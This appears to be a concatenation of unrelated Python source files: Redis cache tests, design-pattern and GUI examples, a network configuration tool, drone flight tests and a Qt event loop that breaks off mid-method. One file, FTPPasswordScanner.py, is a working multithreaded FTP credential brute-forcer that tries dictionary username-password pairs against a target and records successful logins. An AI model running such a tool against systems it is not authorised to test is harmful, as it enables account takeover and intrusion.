def test_cache(self):
cache = redis.RedisCache(self.db)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a)
b = cache.get(key)
self.assertEqual(a, b)
self.assertIsNot(a, b)
cache.delete(key)
self.assertIsNone(cache.get(key))
def test_cache_expire(self):
cache = redis.RedisCache(self.db, ttl=1)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a)
time.sleep(1.1)
self.assertIsNone(cache.get(key))
    def test_cache_expire2(self):
cache = redis.RedisCache(self.db)
key = cache.key('a', 'b', 3)
a = {'a': 12, 'b': 33}
cache.set(key, a, ttl=1)
self.assertEqual(a, cache.get(key))
time.sleep(1.1)
self.assertIsNone(cache.get(key))
class TestRedisQueue(Base):
def test_control_queue(self):
from jukoro.redis.queue import CONTROL_QUEUE
queue = redis.RedisQueue(self.db, CONTROL_QUEUE)
self.assertRaises(redis.QueueError, lambda: queue.keys)
def test_queue(self):
def sender():
db = redis.RedisDb(URI, ns=NS)
queue = redis.RedisQueue(db)
time.sleep(.3)
queue.put('l1', 'a', 'b', 'c')
time.sleep(.3)
queue.put('l2', 'd', 'e', 'f')
time.sleep(.3)
queue.stop()
thread = threading.Thread(target=sender)
thread.daemon = True
thread.start()
queue = redis.RedisQueue(self.db, ['l1', 'l2'])
time.sleep(.1)
res = dict((self.db.key(x), []) for x in ['l1', 'l2'])
for channel, val in queue.consume():
res[channel].append(val)
self.assertEqual(res[self.db.key('l1')], ['a', 'b', 'c'])
self.assertEqual(res[self.db.key('l2')], ['d', 'e', 'f'])
|
FTPPasswordScanner.py
|
import threading
import queue
import ftplib
import json
import socket
class Scanner():
def __init__(self):
self.Url = None
self.addr = None
self.port = 22
self.UsernameFile = None
self.PasswordFile = None
self.UserpassFile = None
self.Threads = 10
self._Counter = 0
self.Timeout = 3
self.UserPassList = []
        self.queue = queue.Queue()
self.Name = 'FTP Password'
def GetFTPPassword(self):
UserpassList = self.LoadPasswordDictionary()
self.addr = socket.gethostbyname(self.Url)
self.port = int(self.port)
self.Threads = int(self.Threads)
self.Timeout = int(self.Timeout)
try:
            while not self.queue.empty():
                if self._Counter < self.Threads:
                    self._Counter += 1
                    thread = threading.Thread(target=self.CheckPassword, args=[self.queue.get()])
                    thread.start()
        except KeyboardInterrupt:
            print('[*] Keyboard interrupt: Quitting.')
            return
        except Exception as e:
            print('[!] Failed attaining FTP password: %s' % str(e))
return self.UserPassList
def LoadPasswordDictionary(self):
        if not self.PasswordFile:
            if not self.UsernameFile:
                mode = 1
            else:
                print('[!] Please specify password file.')
                return
        else:
            if not self.UsernameFile:
                print('[!] Please specify username file.')
                return
            mode = 0
        if mode:
            UserPassJson = json.load(open('FTPPassword.json', 'r'))
            PasswordList = UserPassJson['password']
            UsernameList = UserPassJson['user']
        else:
            UsernameList = open(self.UsernameFile, 'r').read().split('\n')
            PasswordList = open(self.PasswordFile, 'r').read().split('\n')
        UsernameList = self.RemoveDuplicate(UsernameList)
        PasswordList = self.RemoveDuplicate(PasswordList)
        for username in UsernameList:
            for password in PasswordList:
                self.queue.put('%s:%s' % (username, password))
        print('[+] Dictionary load completed, Total %s user-pass pairs.' % str(self.queue.qsize()))
    def CheckPassword(self, credential):
        username, password = credential.split(':')
        sess = ftplib.FTP()
        try:
            sess.connect(self.addr, self.port, timeout=int(self.Timeout))
            sess.login(user=username, passwd=password)
            print('[+] Connect success: %s' % str(credential))
            # Only record credentials that actually logged in.
            self.UserPassList.append(credential)
        except ftplib.error_perm:
            pass  # wrong username/password, keep going
        except Exception as e:
            print('[!] Error trying to login: %s' % str(e))
        finally:
            # Free a worker slot so GetFTPPassword can start another thread.
            self._Counter -= 1
        return
def RemoveDuplicate(self, dict):
NewList = []
for item in dict:
if item not in NewList:
NewList.append(item)
return NewList
def Scan(self):
FTPPasswordList = self.GetFTPPassword()
return FTPPasswordList
def info(self):
        print('''
SWEP FTP PASSWORD SCANNER
Author: BREACHER security
Description: FTP weak password scanner.
ARGS DESCRIPTION
==== ===========
Url Target URL. e.g: www.test.com
Port Target port. Default: 22
UsernameFile (OPTIONAL) Username File.
PasswordFile (OPTIONAL) Password File.
UserPassFile (OPTIONAL) Username and password file.
Threads Threads. Default: 10
        Timeout                 Timeout. Default: 3
        ''')
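
# Minimal usage sketch, assuming an FTP service is reachable at the placeholder
# hostname below and that the bundled FTPPassword.json wordlist sits next to this
# module; the hostname and port here are illustrative, not taken from the class above.
if __name__ == '__main__':
    scanner = Scanner()
    scanner.Url = 'ftp.example.com'  # hypothetical target host
    scanner.port = 21                # standard FTP control port
    found = scanner.Scan()
    # Worker threads may still be finishing, so this list can lag behind the log output.
    print('[+] Working credentials so far: %s' % str(found))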
|
singleton.py
|
# Example of 'Singleton' design pattern (thread-safe version)
from __future__ import annotations
from threading import Lock, Thread
from typing import Optional
class UserMeta(type):
"""Meta class for the Singleton"""
_instance: Optional[User] = None
_lock: Lock = Lock()
def __call__(cls, *args, **kwargs):
with cls._lock:
if not cls._instance:
cls._instance = super().__call__(*args, **kwargs)
return cls._instance
class User(metaclass=UserMeta):
"""Singleton"""
def __init__(self, login: str) -> None:
self.login = login
def __str__(self) -> str:
return f'User: {self.login}'
def create_user(login: str) -> None:
user = User(login)
print(user)
if __name__ == '__main__':
process_one = Thread(target=create_user, args=('__SuperJoe__',))
process_two = Thread(target=create_user, args=('__NotSoSuperJoe__',))
process_one.start()
process_two.start()
|
nosmct.py
|
# Andrew Piroli (c)2019-2021
# MIT LICENSE #
import datetime as dtime
import multiprocessing as mp
import argparse
import os
import logging
import mctlogger
from concurrent.futures import ProcessPoolExecutor, wait
from netmiko import ConnectHandler # type: ignore
from netmiko import NetmikoAuthenticationException, NetmikoTimeoutException
from constants import (
NUM_THREADS_DEFAULT,
THREAD_KILL_MSG,
OperatingModes,
)
from FileOperations import (
abspath,
set_dir,
load_jobfile,
read_config,
preload_jobfile,
sanitize_filename,
)
def run(info: dict, p_config: dict):
"""
Worker thread running in process
    Creates a connection to the specified device, creates a folder for it, and runs through the jobfile, saving the results to the folder
info dict contains device information like ip/hostname, device type, and login details
p_config dictionary contains configuration info on how the function itself should operate. It contains:
mode is class OperatingMode, which tells the process how to interpret the jobs
log_queue is a queue to place log messages
jobfile is the path to the jobfile incase it's not already loaded
jobfile_cache is a dict with a cached list of commands for each device_type
netmiko_debug is a path to a debug file, if present, it will log raw io for each device.
"""
original_directory = abspath(".")
mode = p_config["mode"]
log_q = p_config["log_queue"]
host = info["host"]
jobfile = p_config["jobfile"]
jobfile_cache = p_config["jobfile_cache"]
log_q.put(f"warning running - {host}")
nm_logger = logging.getLogger("netmiko")
nm_logger.removeHandler(nm_logger.handlers[0])
jobfile = jobfile_cache if jobfile_cache is not None else load_jobfile(jobfile)
if p_config["netmiko_debug"] is not None:
nm_logger.setLevel(logging.DEBUG)
nm_log_fh = logging.FileHandler(
str(p_config["netmiko_debug"]) + f"{os.getpid()}.log"
)
nm_logger.addHandler(nm_log_fh)
else:
nm_logger.addHandler(logging.NullHandler())
nm_logger.propagate = False
try:
with ConnectHandler(**info) as connection:
connection.enable()
hostname = sanitize_filename(connection.find_prompt().split("#")[0])
set_dir(original_directory / hostname, log_q)
log_q.put(f"debug run: Found hostname: {hostname} for {host}")
if mode == OperatingModes.YoinkMode:
for cmd in jobfile:
filename = f"{sanitize_filename(cmd)}.txt"
log_q.put(f"debug run: Got filename: {filename} for {host}")
with open(filename, "w") as output_file:
output_file.write(connection.send_command(cmd))
else: # mode == OperatingModes.YeetMode
filename = "configset.txt"
log_q.put(f"debug run: Got filename: {filename} for {host}")
try:
with open(filename, "w") as output_file:
output_file.write(connection.send_config_set(jobfile))
finally:
connection.save_config()
except (NetmikoTimeoutException, NetmikoAuthenticationException) as err:
log_q.put(f"critical Exception in netmiko connection: {err}")
except OSError as err:
log_q.put(f"critical Error writing file: {err}")
finally:
os.chdir(original_directory)
log_q.put(f"warning finished - {host}")
def handle_arguments() -> argparse.Namespace:
"""
Collects and parses command line arguments
"""
parser = argparse.ArgumentParser()
mode_selection = parser.add_mutually_exclusive_group(required=True)
mode_selection.add_argument(
"--yeet",
action="store_true",
help="Yeet mode, push configurations to NOS",
)
mode_selection.add_argument(
"--yoink",
action="store_true",
help="Yoink mode, pull configurations from NOS",
)
parser.add_argument(
"-i", "--inventory", help="The inventory file to load.", required=True
)
parser.add_argument(
"-j",
"--jobfile",
help="The file containing commands to send to the NOS",
required=True,
)
parser.add_argument(
"-t", "--threads", help="The number of devices to connect to at once."
)
parser.add_argument(
"--debug-netmiko",
help="Advanced debuging, logs netmiko internals to a file",
action="store_true",
)
parser.add_argument(
"--no-preload",
help="Disable caching for config files.",
action="store_true",
)
output_config = parser.add_mutually_exclusive_group(required=False)
output_config.add_argument(
"-q", "--quiet", help="Suppress most output", action="store_true"
)
output_config.add_argument(
"-v", "--verbose", help="Enable verbose output", action="store_true"
)
return parser.parse_args()
def main():
"""The entry point for interactive use (the only supported use as of now)
1) Collect command line arguments
2) Configure itself from parsed command line args
3) Read configuration files given
4) Creates output directories
5) Create and start process pool
6) Spinlock until process pool completes or Ctrl-C is received
7) Cleanup and exit.
"""
args = handle_arguments()
start = dtime.datetime.now()
log_level = logging.WARNING
if args.quiet:
log_level = logging.CRITICAL
if args.verbose:
log_level = logging.DEBUG
manager = mp.Manager()
log_q = manager.Queue()
logging_process = mp.Process(target=mctlogger.helper, args=(log_q, log_level))
logging_process.start()
log_q.put("warning Copyright Andrew Piroli 2019-2020")
log_q.put("warning MIT License")
log_q.put("warning ")
selected_mode = OperatingModes.YeetMode if args.yeet else OperatingModes.YoinkMode
log_q.put(f"warning Running in operating mode: {selected_mode}")
try:
NUM_THREADS = int(args.threads) if args.threads else NUM_THREADS_DEFAULT
if NUM_THREADS < 1:
raise RuntimeError(
f"User input: {NUM_THREADS} - below 1, can not create less than 1 processes."
)
except (ValueError, RuntimeError) as err:
log_q.put(
f"critical NUM_THREADS out of range: setting to default value of {NUM_THREADS_DEFAULT}"
)
log_q.put(f"debug {repr(err)}")
NUM_THREADS = NUM_THREADS_DEFAULT
args.inventory = abspath(args.inventory)
config = read_config(abspath(args.inventory), log_q)
args.jobfile = abspath(args.jobfile)
set_dir("Output", log_q)
set_dir(dtime.datetime.now().strftime("%Y-%m-%d %H.%M"), log_q)
netmiko_debug_file = abspath(".") / "netmiko." if args.debug_netmiko else None
preloaded_jobfile = (
preload_jobfile(args.jobfile, log_q) if not args.no_preload else None
)
p_config = {
"mode": selected_mode,
"log_queue": log_q,
"netmiko_debug": netmiko_debug_file,
"jobfile": args.jobfile,
"jobfile_cache": preloaded_jobfile,
}
# Stackoverflow https://stackoverflow.com/a/63495323
# CC-BY-SA 4.0
# By: geitda https://stackoverflow.com/users/14133684/geitda
# Hopefully this improves Ctrl-C performance....
with ProcessPoolExecutor(max_workers=NUM_THREADS) as ex:
futures = [ex.submit(run, creds, p_config) for creds in config]
done, not_done = wait(futures, timeout=0)
try:
while not_done:
freshly_done, not_done = wait(not_done, timeout=0.5)
done |= freshly_done
except KeyboardInterrupt:
for future in not_done:
_ = future.cancel()
log_q.put(
"critical Jobs cancelled, please wait for remaining jobs to finish."
)
_ = wait(not_done, timeout=None)
# End Stackoverflow code
os.chdir("..")
os.chdir("..")
end = dtime.datetime.now()
elapsed = (end - start).total_seconds()
log_q.put(f"warning Time Elapsed: {elapsed}")
log_q.put(THREAD_KILL_MSG)
logging_process.join()
if __name__ == "__main__":
main()
|
run_travis.py
|
import subprocess
import threading
import yaml
from typing import Any, Dict, Iterable, Union
returncodes = {}
def execute_script(script_or_scripts: Union[str, Iterable[str]]):
if isinstance(script_or_scripts, str):
process = subprocess.run(script_or_scripts.split())
return process.returncode
elif isinstance(script_or_scripts, Iterable):
for script in script_or_scripts:
returncode = execute_script(script)
if returncode != 0:
return returncode
return 0
else:
raise ValueError(f"`script_or_scripts` must be a string or iterable of strings, not '{type(script_or_scripts)}'")
def execute_job(job: Dict[str, Any]):
returncodes[job["name"]] = execute_script(job["script"])
if __name__ == "__main__":
config = yaml.safe_load(open(".travis.yml"))
threads = [
threading.Thread(target=execute_job, args=(job, ))
for job in config["jobs"]["include"]
]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
[print(job["name"], returncodes[job["name"]]) for job in config["jobs"]["include"]]
|
main.py
|
# This is a sample Python script.
# Press ⌃R to execute it or replace it with your code.
# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
from util.eplus_model_interface import EplusModelIndexedList
import os
import multiprocessing as mp
FILE_DIR = os.path.dirname(__file__)
from pathlib import Path
def run(eplus_wea: str, eplus_file: str):
"""run energyplus"""
path = Path(eplus_file)
parent_dir = path.parent.absolute()
os.chdir(parent_dir)
os.system("energyplus -w %s -r %s" % (eplus_wea, eplus_file))
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
wea_dir = os.path.join(FILE_DIR, "eplus_files/weather/chicago_tmy3.epw")
models = [os.path.join(FILE_DIR, "eplus_files/bldg1/PythonPluginCustomSchedule1.idf"),
os.path.join(FILE_DIR, "eplus_files/bldg2/PythonPluginCustomSchedule2.idf"),
os.path.join(FILE_DIR, "eplus_files/bldg3/PythonPluginCustomSchedule3.idf")]
# Setup a list of processes that we want to run
processes = [mp.Process(target=run, args=(wea_dir, x)) for x in models]
# Run processes
for p in processes:
p.start()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
clear_app.py
|
import asyncio
import threading
from tkinter import messagebox, Entry
import tkinter as tk
import tkinter.font as font
import tkinter.scrolledtext as scrolledtext
async def start_timer(label_filename, txt_edit):
""" async функция которая выполниться асинхронно в отдельном процессе """
txt_edit.focus_set() # фокус на текстовое поле, чтобы человек мог сразу печатать
txt_edit.configure(state='normal') # активировать текстовое поле
# цикл отсчитывает кол-во секунд, через которые закончиться испытание
for i in range(0, 120):
label_filename.config(text=i, font=("Calibri", 50)) # отображение таймера и его стили
await asyncio.sleep(1.0) # спать 1 секунду
result_text = txt_edit.get(1.0, tk.END) # получаем результирующий напечатанный текст
# print("You typed: ", result_text)
# print("Symbols: ", len(result_text))
txt_edit.delete(1.0, tk.END) # Очищаю напечатанный текст в txt_edit
label_filename.config(text='') # Очищаю текст метки (таймера), после того как время выйдет
messagebox.showinfo(message='Время вышло! Ты завершил испытание!')
result_text = len(result_text.replace(" ", "")) - 1
messagebox.showinfo(message='Ты напечатал {} знаков за 120 секунд'.format(result_text))
def _asyncio_thread(async_loop, label_filename, txt_edit):
""" Асинхронный поток """
async_loop.run_until_complete(start_timer(label_filename, txt_edit))
def do_tasks(async_loop, label_filename, txt_edit):
""" Button-Event-Handler starting the asyncio part. """
    # https://devpractice.ru/python-lesson-22-concurrency-part-1/ TODO: read this and figure out is_alive()
threading.Thread(target=_asyncio_thread, args=(async_loop, label_filename, txt_edit)).start()
def save_current_file(event=False):
    messagebox.showinfo(message='File saved (fake)')
def run_by_hot_key(async_loop, label_filename, txt_edit, event=None):
return do_tasks(async_loop, label_filename, txt_edit)
def main(async_loop):
window = tk.Tk()
window.title("StarTyping - Конкурс по скорости печати")
window.geometry("750x450")
window.rowconfigure(0, minsize=500, weight=1)
window.columnconfigure(1, minsize=500, weight=1)
# implementing scrollbar functionality
scrollbar = tk.Scrollbar(window)
# add scrolledtext and ctrl + Z functionality
txt_edit = scrolledtext.ScrolledText(window, undo=True, wrap=tk.WORD, width=40, state='disabled', height=10, )
fr_buttons = tk.Frame(window, relief=tk.RAISED, bd=2)
    btn_do_tasks = tk.Button(fr_buttons, text="Start", command=lambda: do_tasks(async_loop, label_filename, txt_edit))
    # Create the labels
label_filename = tk.Label(fr_buttons, text='')
    # Attach these buttons to the layout
btn_do_tasks.grid(row=3, column=0, sticky="ew", padx=5, pady=5)
    # Configure how the main elements are displayed
label_filename.grid(row=7, column=0, sticky="nsew", padx=5, pady=40)
fr_buttons.grid(row=0, column=0, sticky="ns")
txt_edit.grid(row=0, column=1, sticky="nsew", padx=20, pady=20)
# define font
myFont = font.Font(family='Helvetica', size=25)
    txt_edit['font'] = myFont  # set the font and size for the text field
    # Create a hotkey listener to start the process. TODO: the combination only works on the Russian keyboard layout
    # pass the local UI variables, including the event parameter from the .bind() method
window.bind('<Control-s>', lambda event: run_by_hot_key(async_loop, label_filename, txt_edit))
# entry = Entry(window, width=30)
# entry.grid(row=3, column=0, sticky="ew", padx=5, pady=5)
window.mainloop()
if __name__ == '__main__':
    async_loop = asyncio.new_event_loop()  # create the asyncio event loop
    asyncio.set_event_loop(async_loop)  # set it as the "main" asyncio event loop
    main(async_loop)  # run the program's main loop, passing in the asyncio loop
|
mavros_offboard_posctl_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2015 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Andreas Antener <andreas@uaventure.com>
#
# The shebang of this file is currently Python2 because some
# dependencies such as pymavlink don't play well with Python3 yet.
from __future__ import division
PKG = 'px4'
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped, Quaternion
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardPosctlTest(MavrosTestCommon):
"""
Tests flying a path in offboard control by sending position setpoints
via MAVROS.
For the test to be successful it needs to reach all setpoints in a certain time.
FIXME: add flight path assertion (needs transformation from ROS frame to NED)
"""
def setUp(self):
super(MavrosOffboardPosctlTest, self).setUp()
self.pos = PoseStamped()
self.radius = 1
self.pos_setpoint_pub = rospy.Publisher(
'mavros/setpoint_position/local', PoseStamped, queue_size=1)
        # send setpoints in separate thread to better prevent failsafe
self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
def tearDown(self):
super(MavrosOffboardPosctlTest, self).tearDown()
#
# Helper methods
#
def send_pos(self):
rate = rospy.Rate(10) # Hz
self.pos.header = Header()
self.pos.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.pos.header.stamp = rospy.Time.now()
self.pos_setpoint_pub.publish(self.pos)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug(
"current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".format(
self.local_position.pose.position.x, self.local_position.pose.
position.y, self.local_position.pose.position.z))
desired = np.array((x, y, z))
pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(desired - pos) < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.pos.pose.position.x = x
self.pos.pose.position.y = y
self.pos.pose.position.z = z
rospy.loginfo(
"attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 20 # North
yaw = math.radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
self.pos.pose.orientation = Quaternion(*quaternion)
# does it reach the position in 'timeout' seconds?
loop_freq = 5 # Hz
rate = rospy.Rate(loop_freq)
reached = False
for i in xrange(timeout * loop_freq):
if self.is_at_position(self.pos.pose.position.x,
self.pos.pose.position.y,
self.pos.pose.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(
i / loop_freq, timeout))
reached = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(reached, (
"took too long to get to position | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
#
# Test method
#
def test_posctl(self):
"""Test offboard position control"""
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
positions = ((0, 0, 0), (5, 0, 5), (5, 1, 5), (5, 0, 5),
(0, 0, 5))
for i in xrange(len(positions)):
self.reach_position(positions[i][0], positions[i][1],
positions[i][2], 30)
# self.set_mode("AUTO.LAND", 5)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 45, 0)
# self.set_arm(False, 5)
self.set_mode("OFFBOARD", 15)
self.set_arm(True, 15)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_posctl_test',
MavrosOffboardPosctlTest)
|
EventLoop.py
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import time
import weakref
import threading
import traceback
import functools
import IECore
import Gaffer
import GafferUI
from Qt import QtCore
from Qt import QtWidgets
## This class provides the event loops used to run GafferUI based applications.
class EventLoop( object ) :
__RunStyle = IECore.Enum.create( "Normal", "PumpThread", "AlreadyRunning", "Houdini" )
## Creates a new EventLoop. Note that if you are creating the primary
# EventLoop for an application then you should use mainEventLoop() instead.
def __init__( self, __qtEventLoop=None ) :
if __qtEventLoop is None :
if self.__mainEventLoop is None or self.__mainEventLoop.__startCount==0 :
raise Exception( "Main event loop is not running - perhaps you should use EventLoop.mainEventLoop()?" )
self.__qtEventLoop = QtCore.QEventLoop()
else :
self.__qtEventLoop = __qtEventLoop
self.__runStyle = self.__RunStyle.Normal
if isinstance( self.__qtEventLoop, QtWidgets.QApplication ) :
try :
import maya.OpenMaya
if maya.OpenMaya.MGlobal.apiVersion() < 201100 :
self.__runStyle = self.__RunStyle.PumpThread
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import hou
if hou.applicationVersion()[0] < 14 :
self.__runStyle = self.__RunStyle.Houdini
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import nuke
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
self.__startCount = 0
self.__pumpThread = None
self.__houdiniCallback = None
## Starts the event loop, passing control to the UI code. This function returns
# when the corresponding stop() method is called. See documentation for
# mainEventLoop() for exceptions to this rule.
def start( self ) :
self.__startCount += 1
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exec_()
elif self.__runStyle == self.__RunStyle.PumpThread :
if self.__pumpThread is None :
self.__pumpThread = threading.Thread( target = self.__pumpThreadFn )
self.__pumpThread.start()
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__houdiniCallback is None :
import hou
hou.ui.addEventLoopCallback( functools.partial( self.__pump, 5 ) )
self.__houdiniCallback = hou.ui.eventLoopCallbacks()[-1]
else :
# RunStyle.AlreadyRunning
# host application is using qt natively, no need to do anything.
pass
## Stops the event loop last started using start().
def stop( self ) :
assert( self.__startCount > 0 )
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exit()
elif self.__runStyle == self.__RunStyle.PumpThread :
## \todo Should we try to stop the pump thread
			# when self.__startCount hits 0? Right now we're
# just keeping it running on the assumption we'll
# need it again soon.
pass
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__startCount == 1 and self.__houdiniCallback :
import hou
hou.ui.removeEventLoopCallback( self.__houdiniCallback )
self.__houdiniCallback = None
else :
# RunStyle.AlreadyRunning
pass
self.__startCount -= 1
## Returns true if this event loop is currently running.
def running( self ) :
return self.__startCount > 0
# if we're running embedded in an application which already uses qt (like maya 2011 or later)
# then there'll already be an application, which we'll share. if not we'll make our own.
if QtWidgets.QApplication.instance() :
__qtApplication = QtWidgets.QApplication.instance()
else :
# set the style explicitly so we don't inherit one from the desktop
# environment, which could mess with our own style (on gnome for instance,
# our icons can come out the wrong size).
QtWidgets.QApplication.setStyle( "plastique" )
__qtApplication = QtWidgets.QApplication( [ "gaffer" ] )
__mainEventLoop = None
## Returns the main event loop for the application. This should always
# be started before running any other nested event loops. In the standalone
# Gaffer applications, the main event loop acts like any other, but when
# GafferUI is embedded in another application (like Maya) it behaves slightly
# differently. In this case, the start() method returns immediately so that
# the GafferUI event loop may be interleaved with the event loop of the host
# application. Additionally, the start() method may also be called multiple
# times to allow several GafferUI-based applications to run in the same host.
# The main event loop will therefore only cease running when the number of
# calls to stop() matches the number of calls to start().
@classmethod
def mainEventLoop( cls ) :
if cls.__mainEventLoop is None :
cls.__mainEventLoop = cls( cls.__qtApplication )
return cls.__mainEventLoop
__idleCallbacks = []
__idleTimer = None
## Adds a function to be called when the event loop is idle (has no events
# remaining to be processed). If callback returns False then it will be removed
# automatically after running, if it returns True it will be called again until
# it returns False, or until removeIdleCallback() is called.
## \todo This should probably be replaced with an idleSignal() like the one we
# have in GafferUI.Gadget.
@classmethod
def addIdleCallback( cls, callback ) :
assert( callback not in cls.__idleCallbacks )
cls.__idleCallbacks.append( callback )
cls.__ensureIdleTimer()
## Removes an idle callback previously created with addIdleCallback().
@classmethod
def removeIdleCallback( cls, callback ) :
cls.__idleCallbacks.remove( callback )
## Convenience method to introduce a delay on the mainEventLoop().
@classmethod
def waitForIdle( cls, count = 1000 ) :
cls.__idleCount = 0
def f() :
cls.__idleCount += 1
if cls.__idleCount >= count :
EventLoop.mainEventLoop().stop()
return False
return True
EventLoop.addIdleCallback( f )
EventLoop.mainEventLoop().start()
## Widgets may only be manipulated on the thread where mainEventLoop() is running. It
# is common to want to perform some background processing on a secondary thread, and
# to update the UI during processing or upon completion. This function can be used from
# such a secondary thread to queue a callable to be called on the main thread. If called
# from the main thread, the callable is called immediately.
@classmethod
def executeOnUIThread( cls, callable, waitForResult=False ) :
if QtCore.QThread.currentThread() == cls.__qtApplication.thread() :
# Already on the UI thread - just do it.
return callable()
resultCondition = threading.Condition() if waitForResult else None
# we only use a weakref here, because we don't want to be keeping the object
# alive from this thread, and hence deleting it from this thread. instead it
# is deleted in _UIThreadExecutor.event().
uiThreadExecutor = weakref.ref( _UIThreadExecutor( callable, resultCondition ) )
uiThreadExecutor().moveToThread( cls.__qtApplication.thread() )
if resultCondition is not None :
resultCondition.acquire()
cls.__qtApplication.postEvent( uiThreadExecutor(), QtCore.QEvent( QtCore.QEvent.Type( _UIThreadExecutor.executeEventType ) ) )
resultCondition.wait()
resultCondition.release()
return resultCondition.resultValue
else :
cls.__qtApplication.postEvent( uiThreadExecutor(), QtCore.QEvent( QtCore.QEvent.Type( _UIThreadExecutor.executeEventType ) ) )
return None
@classmethod
def __ensureIdleTimer( cls ) :
